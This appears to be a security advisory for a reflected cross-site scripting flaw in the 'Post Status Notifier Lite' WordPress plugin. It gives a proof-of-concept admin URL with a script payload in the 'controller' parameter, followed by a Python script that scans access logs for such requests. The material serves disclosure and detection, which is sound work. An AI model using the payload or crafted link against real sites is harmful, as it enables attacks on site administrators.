The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting vulnerability which can be used against high-privilege users such as admins.
Make a logged-in, high-privilege user such as an admin open the URL below:
https://example.com/wp-admin/options-general.php?page=post-status-notifier-lite&controller=<script>alert(`xss`)</script>
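
One way to spot requests of this shape in web server access logs, as an added example that is not part of the advisory or the plugin's code. The combined log format, the character allowlist for legitimate `controller` values and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

PLUGIN_PAGE = "post-status-notifier-lite"
ADMIN_PATH = "/wp-admin/options-general.php"
# Assumption: legitimate controller values are plain identifiers.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]*")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic); "rules" is a made-up value.
_LINE = '203.0.113.9 - - [01/Jan/2024:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
_BASE = ADMIN_PATH + "?page=" + PLUGIN_PAGE + "&controller="
SAMPLE_LOG = [
    _LINE.format(_BASE + "rules"),
    _LINE.format(_BASE + "%3Cscript%3Ealert(%60xss%60)%3C/script%3E"),
    _LINE.format(ADMIN_PATH + "?page=general&controller=%3Cb%3E"),
    _LINE.format(_BASE + "%253Cscript%253E"),  # double-encoded
]


def suspicious_controller(log_line):
    """Return the decoded controller value if it is not a plain identifier."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    parts = urlsplit(match.group(1))
    if not parts.path.endswith(ADMIN_PATH):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if PLUGIN_PAGE not in params.get("page", []):
        return None  # some other settings page, out of scope here
    for value in params.get("controller", []):
        # parse_qs decodes once; decode again to expose double encoding.
        decoded = unquote(value)
        if not SAFE_VALUE.fullmatch(decoded):
            return decoded
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_controller(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: controller={value!r}")
```

A hit only shows that such a URL was requested. Because the payload is reflected, correlate flagged requests with authenticated admin sessions to judge impact.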